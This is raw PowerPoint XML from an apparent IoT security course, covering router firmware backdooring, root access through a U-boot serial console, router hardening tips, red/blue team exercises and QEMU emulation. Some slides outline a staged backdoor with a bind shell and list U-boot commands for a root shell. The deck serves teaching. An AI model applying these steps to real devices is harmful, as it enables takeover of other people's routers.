              <a:t>Router Exploitation</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Compile backdoor</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Repackage firmware with firmware mod kit</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Build-ng.sh</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Change firmware size and 1 byte running xor of header and 1 byte running xor of body</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Use staged deployer</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First stage small</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Second stage downloaded to /tmp (a ram disk)</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OR modify existing binary that runs on start-up</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Stage 2 functionality</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Downloader</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Bind shell</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Capture program output and write it to disk</a:t>
            </a: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946D81F9-A272-A740-B737-3F932C9EA0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27947387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1" y="113983"/>
            <a:ext cx="11083108" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Router Exploitation</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 help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Remove debugging ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Remove unnecessary services (e.g.-telnetd)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Lock down web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Filter all input to device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Encrypt and sign firmwars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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201EA856-4D43-5B49-BC3B-CA280CB44EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39785471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1" y="113983"/>
            <a:ext cx="11213736" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Router Exploitation</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To help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Remove debugging ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Remove unnecessary services (e.g.-telnetd)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Lock down web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Filter all input to device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Encrypt and sign firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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064159F1-00EB-C545-8B83-7494CB387580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258589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 – details, 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2010748"/>
            <a:ext cx="11582400" cy="4200995"/>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Get the console window via the Attify connection using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> utility, the baud rate is 115200.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="20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screen /dev/ttyS0 115200</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Apply power to IoT device and hold down space bar in console (to prevent kernel boot).  You should drop into the U-boot command line.  This is hard and you may have to “reboot” many times before this works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Uboot commands are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.  </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To get in single user (as root):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  sf probe 0 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  sf read ${loadaddr} ${sfkernel} ${filesize}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  bootz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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D78A4592-6A69-4940-AC15-9BDAAF0BA4AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38666346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36" y="363372"/>
            <a:ext cx="9969910" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More things to do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468284" y="1983588"/>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IoT role in the Fourth Industrial Revolution (Industry 4.0) - case study?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IoT in Intelligent Vehicle Highway System (case study?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Design a key update mechanism for data collection IoT devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Red team a router (that we know is vulnerable).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Have a Blue team improve the router security and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Red team it again.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFA0D8A-3CD1-064E-8E65-BC88C9264BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37455674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KVM Qemu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743919" y="1801090"/>
            <a:ext cx="10740325" cy="4258427"/>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Install kvm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sudo apt-get qemu-kvm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qemu-img –f qed create image.img 10G</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x86_64 -hda disk.img -cdrom debian-607-amd64</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x86_64 -hda disk.img</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x86_64 -hda disk.img -net nic </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x86_64 -hda disk.img -net nic,macaddr=00:20:…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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x86_64 -net nic,model=? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>qemu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-x86_64 disk.img -net nic -net user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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37507245-6E9F-F446-BA8C-8576A793EE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2496237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413" y="504014"/>
            <a:ext cx="10387622" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simulate an embedded Linux image with Qemu</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790413" y="1919917"/>
            <a:ext cx="10883943" cy="47111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wget https://download.qemu.org/qemu-2.11.0.tar.xz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tar xvJf qemu-2.11.0.tar.xz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cd qemu-2.11.0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./configure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sudo apt-get install libglib2.0-dev zlib1g-dev </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>sudo make install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qemu-system-arm -M ? </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export PATH=/home/developer/armsystem/toolchain/gcc-arm-none-eabi-7-2017-q4 major/bin/:$PATH</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qemu-system-arm -M vexpress-a15 -m 512 -kernel arch/arm/boot/zImage -dtb arch/arm/boot/dts/vexpress-v2p-ca15-tc1.dtb -append "console=tty1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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8B222E78-4865-5A43-843F-E98B6A0F131F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7979575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354868"/>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Install safe control software on a drone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534785" y="2213399"/>
